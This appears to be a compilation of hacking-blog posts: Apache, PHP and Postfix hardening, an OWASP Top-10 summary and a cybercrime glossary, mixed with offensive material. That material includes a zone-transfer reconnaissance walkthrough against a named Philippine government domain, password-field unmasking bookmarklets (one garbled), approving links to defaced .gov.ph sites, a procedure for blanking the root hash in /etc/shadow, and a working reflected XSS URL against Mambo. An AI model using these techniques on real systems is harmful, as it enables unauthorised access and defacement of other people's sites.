Secure your apache server from given info to hackers

By default, most pre-packaged apache installations come with full information leakage, so if you telnet to port 80 on your webserver you can check, just type in the GET / HTTP/1.1 line, then hit enter twice

#telnet localhost 80
Trying 127.0.0.1…
Connected to localhost.localdomain.
Escape character is ‘^]’.
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Fri, 30 Mar 2007 09:59:37 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-18
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

Here we see the Apache version, the distro, and the php version. If you had any extra apache modules installed, it would also show them as well as their versions. We can easily fix this by modifying the config file which will be distribution dependent. On Debian/Ubuntu its /etc/apache2/apache2.conf,We will need to modify the ServerSignature and ServerTokens lines, if you don’t have them, add them in. Here’s what they should be set to

ServerSignature Off
ServerTokens Prod

Now you need to Secure PHP version information

By default when php serves a page your header will show

X-Powered-By: PHP/4.X.X

You need to modify the php.ini and set the expose_php variable to Off. For Debian/Ubuntu, the file is /etc/php4/apache2/php.ini (If you are using php5 you need to edit this file /etc/php4/apache2/php.ini) . This will remove the X-Powered-By line.

expose_php = Off

Another problem in php could be display_errors, you want this turned off for a production web site because it might provide file paths or other informaiton.

display_errors = Off

Now you need to restart the apache web server using the following command

#/etc/init.d/apache2 restart

Test your Apache server

telnet to port 80 on your webserver just type in the GET / HTTP/1.1 line, then hit enter twice

# telnet localhost 80
Trying 127.0.0.1…
Connected to localhost.localdomain.
Escape character is ‘^]’.
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Fri, 30 Mar 2007 09:59:37 GMT
Server: Apache
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1

Now you can see in the above information you don’t find any apache version details,Distro and php version details.

Stop SPAM Using Postfix Configuration

I assume you have a fully working mail server using Postfix. There are a lot of docs and howto to configure postfix as your mail server.

Open /etc/postfix/main.cf and place the following lines in it (replacing the respective settings if they exist):

vi /etc/postfix/main.cf

smtpd_recipient_restrictions =
permit_mynetworks,
permit_sasl_authenticated,
reject_unauth_destination,
reject_invalid_hostname,
reject_non_fqdn_hostname,
reject_non_fqdn_sender,
reject_non_fqdn_recipient,
reject_unknown_sender_domain,
reject_unknown_recipient_domain,
reject_unauth_pipelining,
permit_mynetworks,
reject_rbl_client zen.spamhaus.org,
reject_rbl_client multi.uribl.com,
reject_rbl_client dsn.rfc-ignorant.org,
reject_rbl_client sbl-xbl.spamhaus.org,
reject_rbl_client bl.spamcop.net,
reject_rbl_client dnsbl.sorbs.net,
reject_rbl_client ix.dnsbl.manitu.net,
reject_rbl_client combined.rbl.msrbl.net,
reject_rbl_client rabl.nuclearelephant.com,
reject_rbl_client list.dsbl.org,
reject_rbl_client sbl.spamhaus.org,
reject_rbl_client cbl.abuseat.org,
reject_rbl_client dul.dnsbl.sorbs.net,
reject_rbl_client multihop.dsbl.org,
reject_rbl_client unconfirmed.dsbl.org
reject_rbl_client relays.ordb.org,
permit

This just tell Postfix to check those website if it is listed on their spam database before sending out to the users.

Anti-spam blacklist

disable_vrfy_command = yes
smtpd_delay_reject = yes
smtpd_helo_required = yes
smtpd_sender_restrictions = reject_unknown_address
smtpd_helo_restrictions =
permit_mynetworks,
reject_non_fqdn_hostname,
reject_invalid_hostname,
permit
strict_rfc821_envelopes = yes
invalid_hostname_reject_code = 554
multi_recipient_bounce_reject_code = 554
non_fqdn_reject_code = 554
relay_domains_reject_code =554
unknown_address_reject_code = 554
unknown_client_reject_code = 554
unknown_hostname_reject_code = 554
unknown_relay_recipient_reject_code = 554
unknown_virtual_alias_reject_code = 554
unknown_virtual_mailbox_reject_code = 554
unverified_recipient_reject_code = 554
unverified_sender_reject_code = 554

Also force Postfix to limit incoming or receiving email rate to avoid spam.

smtpd_error_sleep_time = 1s
smtpd_soft_error_limit = 10
smtpd_hard_error_limit = 20

Just put this in your main.cf and restart Postfix. I have 250+ users and this configuration block over 1500+ spam emails a day.

10 reasons websites get hacked

Below you will find list of top 10 web vulnerabilities classified by OWASP, here is also description of the problem and some examples.

I will just give you the list in case you missed it before, i will not comment on any of these as there is already hot discussion about this matter on several sites/forums.

So here it starts:
1. Cross site scripting (XSS)
The problem: The “most prevalent and pernicious” Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.
Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank’s Web site, according to Snyder.
Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details. PayPal said it closed the vulnerability in June 2006.
How to protect users: Use a whitelist to validate all incoming data, which rejects any data that’s not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad. Additionally, use appropriate encoding of all output data. “Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser,” OWASP says.

2. Injection flaws
The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter — which interprets text-based commands — into executing unintended commands. “Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application,” OWASP writes. “In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.”
Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.
How to protect users: Avoid using interpreters if possible. “If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries,” OWASP writes.

3. Malicious file execution
The problem: Hackers can perform remote code execution, remote installation of rootkits, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development.
Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.
How to protect users: Don’t use input supplied by users in any filename for server-based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems.

4. Insecure direct object reference
The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.
Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.
“References to database keys are frequently exposed,” OWASP writes. “An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature.”
Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.
How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can’t avoid direct references, authorize Web site visitors before using them.

5. Cross site request forgery
The problem: “Simple and devastating,” this attack takes control of victim’s browser when it is logged onto a Web site, and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or “remember me” functionality. Banks are potential targets.
“Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery,” Williams says. “Has there been an actual exploit where someone’s lost money? Probably the banks don’t even know. To the bank, all it looks like is a legitimate transaction from a logged-in user.”
Real-world example: A hacker known as Samy gained more than a million “friends” on MySpace.com with a worm in late 2005, automatically including the message “Samy is my hero” in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user’s language preferences.
How to protect users: Don’t rely on credentials or tokens automatically submitted by browsers. “The only solution is to use a custom token that the browser will not ‘remember,’” OWASP writes.

6. Information leakage and improper error handling
The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program’s configuration and internal workings.
“Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks,” OWASP says.
Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company’s database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.
How to protect users: Use a testing tool such as OWASP’S WebScarab Project to see what errors your application generates. “Applications that have not been tested in this way will almost certainly generate unexpected error output,” OWASP writes.

7. Broken authentication and session management
The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.
“Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeout, remember me, secret question and account update,” OWASP writes.
Real-world example: Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords in 2002. Revealed by a networking products reseller, the flaw was vulnerable to e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers.
How to protect users: Communication and credential storage has to be secure. The SSL protocol for transmitting private documents should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.
Another tip: get rid of custom cookies used for authentication or session management.

8. Insecure cryptographic storage
The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it’s often poorly designed, using inappropriate ciphers.
“These flaws can lead to disclosure of sensitive data and compliance violations,” OWASP writes.
Real-world example: The TJX data breach that exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.
How to protect users: Don’t invent your own cryptographic algorithms. “Only use approved public algorithms such as AES, RSA public key cryptography, and SHA-256 or better for hashing,” OWASP advises.
Furthermore, generate keys offline, and never transmit private keys over insecure channels.

9. Insecure communications
The problem: Similar to No. 8, this is a failure to encrypt network traffic when it’s necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.
Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.
“The $17.4-billion retailer's wireless network had less security than many people have on their home networks,” the Journal wrote. TJX was using the WEP encoding system, rather than the more robust WPA.
How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.

10. Failure to restrict URL access
The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there’s no real protection of these pages, and hackers can find the URLs by making educated guesses. Say a URL refers to an ID number such as “123456.” A hacker might say ‘I wonder what’s in 123457?’ Williams says.
The attacks targeting this vulnerability are called forced browsing, “which encompasses guessing links and brute force techniques to find unprotected pages,” OWASP says.
Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get “Platinum” passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server.

How to protect users: Don’t assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user’s role and privileges. “Make sure this is done … every step of the way, not just once towards the beginning of any multi-step process,’ OWASP advises.


Comments and introduction to Top-10 list can be found on following:
The Open Web Application Security Project 
Network World
Info World 
Computer World

DNS Extract Zones

Let's just say I'm curious what is in the records of someones DNS server.

First I need the IP address using the host command.


Why www.dost.gov.ph? Because they are the Department of Science and Technology.

Second step. Go to dnsstuff.com and look for DNS Report. Enter the domain www.dost.gov.ph and click DNS Report button.
Now you will get the report. What I want is the IP of the DNS Server this domain name is registered.

So I have the IP of the nameservers.
Next step, use the dig command to view the zone records.
Try the first IP:
This means that the server deny zone transfer.
Now the second IP prints the zone records of the domain.
What's the use of this? You have information!

"How to do it on Google"
Software: WS-DNS-BFX

What does it do?
This program was written to extract valid hosts of a domain that deny zone transfers.
The program supports:

• IPv4 => IP Address of 32 bits.
• IPv6 => IP Address of 128 bits.
• Multi Thread => Make several resolutions at “the same time”.
• EMA => Extract more than 1 IP in servers with HA, Network Load Balance, etc, (like: www.yahoo.com, www.microsoft.com).

How do I compile it?
To compile it, do:

gcc -o WS-DNS-BFX WS-DNS-BFX.c -lpthread -D_REENTRANT -D_THREAD_SAFE

To best performance do:
gcc -o WS-DNS-BFX WS-DNS-BFX.c -lpthread -D_REENTRANT -D_THREAD_SAFE -O3

If u don’t have a compiler (gcc), libs, etc, i added at the .tgz file this program compiled static, called “WS-DNS-BFX-Static”.

How do I use it?
It is easy to use this program. Supose that you want extract valid hosts from
“yahoo.com”, using dict-file.txt (Brute Force File) and open 4 threads,
to do it the command is:

root@Debian:/tmp/WS-DNS# ./WS-DNS-BFX yahoo.com dict-file.txt 4
Progress ..............................

When it finish, will be generated a file called “hosts-yahoo.com.txt” with the extracted hosts.

You can download it here: DNS Brute Force eXtract

And let the password be unmask!!!

If you ever come across a page like below, then this is for you!

You might have heard about Sandboy's Revelation who unmask password fields like this!
But Revelation works with only windows based application and fails with Firefox! Once again thanks to open-source for Firefox!

Now lets do it in Geekish way so it will work with all kinda browsers and of course independent of platform!

Here comes javascript which is tested on Firefox & IE!

javascript: alert(document.getElementById('Passwd').value);

Just copy above code and paste it in ur browsers address bar (navigation bar or url bar).


They press enter and you will see a prompt like this!Of course your password may be different!

There is one more similar script! This will change HTMLs <input> tags "type" attribute from "password" to "text"!

javascript: alert(document.getElementById('Passwd').type='text');

On hitting enter you will see a prompt, just ignore it and look at screen... The password field will be unmasked any now and look like this!The above script may fail on hotmail when opened in firefox! But don't worry.

Try following code in the same way! This does not work with antique IE 6.0 and with release of firefox 2.0, I did not bothered to give IE 7.0 a try!

This will again prompt password like above!

javascript: function getElementsByAttribute(oElm, strTagName, strAttributeName, strAttributeValue){ var arrElements = (strTagName == "*" && oElm.all)? oElm.all : oElm.getElementsByTagName(strTagName); var arrReturnElements = new Array(); var oAttributeValue = (typeof strAttributeValue != "undefined")? new RegExp("(^|\\s)" + strAttributeValue + "(\\s|$)") : null; var oCurrent; var oAttribute; for(var i=0; i< ocurrent =" arrElements[i];" oattribute =" oCurrent.getAttribute" oattribute ="="> 0){ if(typeof strAttributeValue == "undefined" || (oAttributeValue && oAttributeValue.test(oAttribute))){ arrReturnElements.push(oCurrent);}}} return arrReturnElements; } alert( getElementsByAttribute(document.body, "input", "type", "password")[0].value);

And this will unmask password filed like above!

javascript: function getElementsByAttribute(oElm, strTagName, strAttributeName, strAttributeValue){ var arrElements = (strTagName == "*" && oElm.all)? oElm.all : oElm.getElementsByTagName(strTagName); var arrReturnElements = new Array(); var oAttributeValue = (typeof strAttributeValue != "undefined")? new RegExp("(^|\\s)" + strAttributeValue + "(\\s|$)") : null; var oCurrent; var oAttribute; for(var i=0; i< ocurrent =" arrElements[i];" oattribute =" oCurrent.getAttribute" oattribute ="="> 0){ if(typeof strAttributeValue == "undefined" || (oAttributeValue && oAttributeValue.test(oAttribute))){ arrReturnElements.push(oCurrent);}}} return arrReturnElements; } ; alert( getElementsByAttribute(document.body, "input", "type", "password")[0].type="text" ) ;

Above scripts successfully tested on gmail, yahoo, hotmail, rediff login pages! In fireox you can also right-click on any frame and can open that frame separately in different window or tab and then can use any of above script!

Also any password field can be unmasked using DOM Inspector in firefox! Please don't make false assumption that firefox is insecure! There is a feature called "master password" in firefox! That will protect your passwords against all javascript, DOM Inspectors, etc!

Enjoy!!!

Another .gov.ph Defacements

http://samalcity.gov.ph/media/Hmei7.htm

Very cool hack. This site is Mambo based. I've seen a lot or should I say soooo many Mambo site that got hacked. So I advised, migrate to Joomla! :)

Hacking with Javascript

This hack simply make the images of the website to rover the page. This is how it's done.
1.) Go to any website with images like http://www.microsoft.com
2.) Now you're in the home page, delete the URL in the address bar of your browser and replace it with this script: javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute '; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
3.) And of course, press enter.
4.) Thadah!!!

Is that Google in the URL bar? Did I really owned google? This is how it's done:
1.) Go to http://www.google.com
2.) Delete and replace the url with this script: javascript:document.write("0wn3d by chr1x2");

Simple but cool!

Another .gov.ph Defacements

Energy Regulatory Commission
http://www.erc.gov.ph/sina.html
National Power Corporation
http://www.napocor.gov.ph/webnpc/main.htm

Another .gov.ph Defacement

Philippine Institute for Development Studieshttp://webmail.pids.gov.ph

http://glen.pids.gov.ph/
http://tux.pids.gov.ph/

Another .gov.ph Defacements

House of Representatives Official Website

http://congress.gov.ph/download/bids/rst.html

Philippine Children's Medical Center

http://www.pcmc.gov.ph/cosmmin.html

Zone-H is back!

Have you recently seen a different Zone-H when trying to access our pages? Magic of DNS redirection.

It appears that Saudi Arabia crackers managed to get the passwords of our registrar (our registrant panel to be precise), accessed the domain management page and changed the DNS entries, pointing the zone-h domain to an IP address belonging to the crackers on which they mounted the page you saw in the last 48 hours.

48 hours!?! So long it took to take contact with the registrar (they work only through email communication), explain the problem to 8 different people then finally getting a reset of our credentials, taking the domain back in control.

On the funny side, the same problem happened to Google in its German version which yesterday evening was redirected to a different page (different owner actually). In this case (automatic German/English translation) the trick was a bogus domain transfer request that a German provider accepted without explicit authorization from Google Inc. (silence-consense).

What a day! We are so glad we deserve so much of attention.

PS: you will soon find the mirrors in our DB as even though Zone-H wasn't hacked, from the users' point of view it appeared defaced, as only a few users realized they weren't visiting the actual Zone-H server. From the historycal point of view exactly the same incident happened to the Al jazeera sat tv network website, where a hacker managed to trick the registrar to send him the domain control passwords after sending a bogus passport copy during the ID verification process, subsequently changing Al Jazeera's DNS pointing to a different server.

Hacking root password

This is the easiest way to hack root password. This works on most Linux distro.
Boot from a linux 'live cd', I prefer Knoppix STD and edit '/etc/passwd' directly.

boot from a knoppix cdrom:

log into prompt

mkdir /tmp
mount /dev/md2 /tmp => (or appropriate root partition)
vi /tmp/etc/shadow

remove all encrypted md5 text (everything between the first and second colons)
use  + x to delete text)

reboot the system

log in as root with no passwd

change the root passwd with 'passwd

Cybercrime Vocabulary

I have tried to put a collection of important terms related to cybercrime, in general. Browse through this list to see how much of these terms you are already familiar with. This may serve as a good background reading, before you take a plunge into the depths of cybercrime.

A
Adware: A program that displays advertising through pop-up or pop-under windows while you are browsing the net.
Algorithm: A procedure or formula that specifies how to solve a problem. In the world of computer programs, this term refers to a particular programming technique.
Anti-spyware software: A computer program that combats spyware.
Anti-virus software: A computer program that combats harmful viruses. Anti-virus software seeks and removes viruses from your computer.
ARPANet: Advanced Research Projects Agency or ARPA was a network that was setup to enable the military and different sections of the government to maintain communications with one another under all circumstances. It became the foundations of what is known today as the World Wide Web.
Attachment (with regard to emails): A file that is sent together with a particular email.
Auction fraud: See Internet auction fraud
Auction sites: Websites that host online auctions, through which potential buyers and merchants interact.

B
Backdoor: An undocumented way of gaining access to a program, a computer system or network. The backdoor is usually implemented by the creator of the program, and is usually only known to him. A backdoor is a potential security risk.
Bandwidth: The bandwidth refers to the rate at which information can be sent through a channel. The greater the bandwidth, the more the information that can be sent in a given amount of time.
Blue Box: A device used to hack into telephone systems.
Brute forcing: Brute forcing involves finding out a solution to a problem in a trial and error way, by trying out all the possible combinations until the correct solution is reached. Such a method is often used to 'crack' passwords. The perpetrator tries all the combinations of the alphabet until he obtains the correct password.

C
Con Artist: Con artists are basically fraudulent characters, who trick or cheat others out of their money or assets.
Copyright infringement: Violation of a person's or an organization's copyright through unauthorized copying or use of a work or other subject matter under copyright.
Cracker: Term used to describe a computer criminal who breaks into or harms computers.
Cracking: Cracking can be defined as modifying a program, to make it behave as you want it to behave and not behave as what its creator had wanted.
Cryptography: A process related to scrambling plaintext (ordinary text, or clear text) into ciphertext (a process called encryption), then back again (known as decryption). The aim here is to protect sensitive information from unauthorized access.
Cyberstalking: Stalking is a series of actions that puts a person in fear for their safety. A stalker may follow you, harass or black mail you. Cyberstalking is the act of stalking, but carried out with the aid of (or through) computers and the Internet.
Cyber punks: The stereotypical image of hackers, they are usually antisocial, socially inept, and burdened with angst directed towards the real world which was unfair to them.
Cyberterrorism: The act of carrying out terrorism using cyberspace, or in other words, the Internet. It is the hacking or attacking of networks and computers to obtain or modify information for political and/or social objectives or rather, a way to quickly and easily distribute propaganda and get a lot of attention drawn to it.

D
Denial-of-Service (DoS) Attack: Repeated attack of a particular network or server until it is too overwhelmed and is brought down.
Disassembler: A cracking utility used by the crackers to reveal the coding of a program.
Dumpster diving: Dumpster diving involves going through your trash bins and garbage to retrieve copies of your checks, credit card or bank statements, or other sensitive records that you have not properly disposed of, e.g. by shredding.

E
Email flooding: The act of sending huge volumes of emails to a single user at any one time.
Encryption: The process of p reventing an unauthorized person from reading or changing a particular data, by protecting the data.
Escrow service: Escrow services act as a trusted third-party during the transaction. They manage the payment process from start to finish, therefore protecting both buyer and seller.
Ethical hacking: Use of hacking knowledge to forcefully attempt to enter a network to find its weaknesses. It is also referred to as 'legalized hacking'.

F
Firewall: An impassable boundary to most Internet traffic. It forms a wall around networks or individual computers protecting them from potential harm.
Fraud: Intentional deception resulting in unlawful gain.

H
Hacking: In the olden days, hacking referred to basically exploring and figuring out how the wired world works. Geeks who did this were called hackers.
However, today, the term is often used to describe computer criminals who break into or harm computers. Purists want those who break into computers to be called as "crackers" rather than "hackers".
Hoax: Something intended to deceive.
Hobbyists: Hobbyists are people who take up cracking just for the pure sake of knowledge.

I
Identity theft: Identity theft occurs when an unscrupulous person obtains enough of your personal information to be able to impersonate you and use your identities to obtain financial gain.
Internet auction fraud: Committing fraud by exploiting the internet auctions held by the many online auction sites, for mainly monetary reasons.
Intrusion detection system (IDS): As its name implies, an IDS detects any intrusion into the system (i.e. an illegal entry attempt by a hacker). An IDS runs in the background and silently monitors the network for any suspicious activity.
IP address: Internet Protocol address, or IP address is a unique number which is assigned to every computer connected to the Internet.
ISP (Internet Service Provider): A company that provides Internet access.

J
Junk email: Unwanted email messages that are forcibly sent to you.

L
Loophole: Flaw or weakness

M
Mainframes: Large and expensive computers historically associated with centralized rather than distributed computing. These computers are capable of supporting hundreds, or even thousands, of users simultaneously.
Malware: Malware or malicious programs are written with the intention of causing various types of damages and nuisances to a computer and the information on the computer.
Multimedia: A generic term to r efer to audio, video, graphics, and images.

N
Network: The term “network” refers to an interconnected system of computers.
Network attack: An attempt to bring down a network in order that it becomes almost totally unusable.
Network intrusion: Network intrusion is unauthorized entry into a network (an interconnected system of computers).
Nigerian letter scam: Another manifestation of the cyber fraud, which tries to rob innocent people of their money. Also known as the "Advance Fee Fraud" or "4-1-9" scheme (named after the relevant section of the Nigerian Criminal Code that it violates).

P
Password crackers: Password crackers concern themselves with cryptography and how to break current encryption techniques.
Pedophile: A person who is sexually attracted to children
Peer-to-Peer (P2P): File swapping systems that allow its users to share files and computing resources.
Phishing: The act of sending faked e-mails to a user that falsely appears to come from a legitimate (and often well-known) business enterprise. This is an attempt to lure unsuspecting email users to divulge their personal data such as account usernames, passwords and credit card numbers on a bogus website.
Phreaker: The perpetrator of phreaking.
Phreaking: The act of breaking into phone networks to make free phone calls.
Piracy: Piracy involves the illegal reproduction and distribution of software applications, games, movies and audio CDs.
Pirates: People who carry out piracy.
Pop-up window: A new internet browser window that appears suddenly, unrequested (by you) on your screen. Commonly used for advertisements.
Protocol: When data is being transmitted between two or more devices, something needs to ensure that these data remain intact. Hence a protocol is implemented, which is basically a set of rules determining the format and transmission of data.
Pyramid schemes: Email messages or messages on the Internet which tell you how, for a relatively small investment, you can make huge amounts of money. The concept and motive is always the same, which is to fool naïve or financially desperate people.

R
Reverse engineering: The process of disassembling a piece of hardware or software to find out how it works.

S
Scam: A fraudulent business scheme aimed to hoodwink an individual or corporation. The perpetrator typically promises his victims a large financial return with little or no risk involved.
Script Kiddies: These are people (usually teenagers) who want to be recognized as dangerous hackers but lack miserably in the required determination and skills. They use ready-made cracking programs (made by others), intending to cause damage to and corrupt systems.
Server: A computer that is dedicated to a particular purpose and which stores all information and does the important functions for that purpose.
Shoulder surfing: Refers to keeping a watch on you as you enter your personal information, such as your password or credit card number or eavesdropping on your personal conversation.
Social engineering: Term used among crackers for exploiting potential weaknesses in people to their advantage, for e.g. hoodwinking someone into giving out sensitive information such as passwords and usernames.
Spamming: Spamming is the act of sending unsolicited messages to many users at a time, possibly up to the thousands, with the usual intention of advertising products to potential customers.
Spyware: A program that gathers information about a person or an organization and sends this information to a third party, often without their permission or knowledge.
Steganography (also called Stego): Steganography is basically hiding information in plain sight. Steganography, is used to hide information in computer files. Information can be generally hidden in various file formats, such as: images, audio files, text files and Word documents.
Superuser: The computer user (account) with the most privilege. The superuser has complete access privileges to all files on the computer.

T
Trojan horse: Trojan horses (or simply Trojans) are computer programs that that disguise themselves to be useful software, but instead they compromise your security and privacy. Trojans can allow hackers to take control of your computer or capture your keystrokes.

U
URL: Abbreviation for Uniform Resource Locator, which refers to the address of a particular website.
Usenet Newsgroups: A system of special interest groups to which readers can post messages. These messages are sent out to other computers on the network.

V
Virus: A virus is a piece of computer code that that hides within other programs or documents so it can spread from computer to computer, infecting as it travels. Viruses can damage your software, your hardware, and your files. Viruses are often written with the intention of replicating themselves.

W
Warez: Refers to commercial software, movies and games that has been modified by a cracker and made freely available to the public on the Internet.
Website Defacement: The act of damaging the appearance of a website.
White Collar Crime: Crimes of theft and deception committed by qualified professionals.
Worm: A worm is a computer program which is programmed to spread from one computer to another maliciously, without any user interaction. Worms do not need to travel through a "host" program or file. They can travel alone and replicate themselves in great volume and slow down computer networks.

Zone-H GOT DEFACED Again!!!

Oh man! This is headline! The well known IT security resource on the planet is not well secured?
Well, zone-h have been dafeced several times. Dec. 21 or Dec. 22 of last year was the most recent.
And now, the latest! It has music... It's everywhere on it's directory.
hahaha!!!
www.zone-h.org are very pissed right now!
I guess zone-h can now add their website to their archive.

Persian Mambo V4.6.1 still vulnerable to XSS!!!

I just install the latest Mambo version and run this script

http://localhost/mambo/index.php?option=com_content&task=view&id
=18&Itemid=39%22%3E<script>alert(document.cookie)</script
>&mosmsg=%3Ch1%3EHi,%20I%20am%20chr1x2%20,%20THIS
%20IS%20XSS%PROBLEM!!!%3C/h1%3E%3Cbr%3E%3Cbr%3E%
3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%
3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3EThey said this is already fixed?

I also run the script in joomla.

Top 15 Security/Hacking Tools & Utilities

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.

Get Nessus Here

3. John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.

You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).

Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.

Get p0f Here

7. Ethereal

Ethereal is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Ethereal features that are missing from closed-source sniffers. Screenshot available here. Windows binaries available here.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Ethereal later.

Get Ethereal Here

8. Yersinia

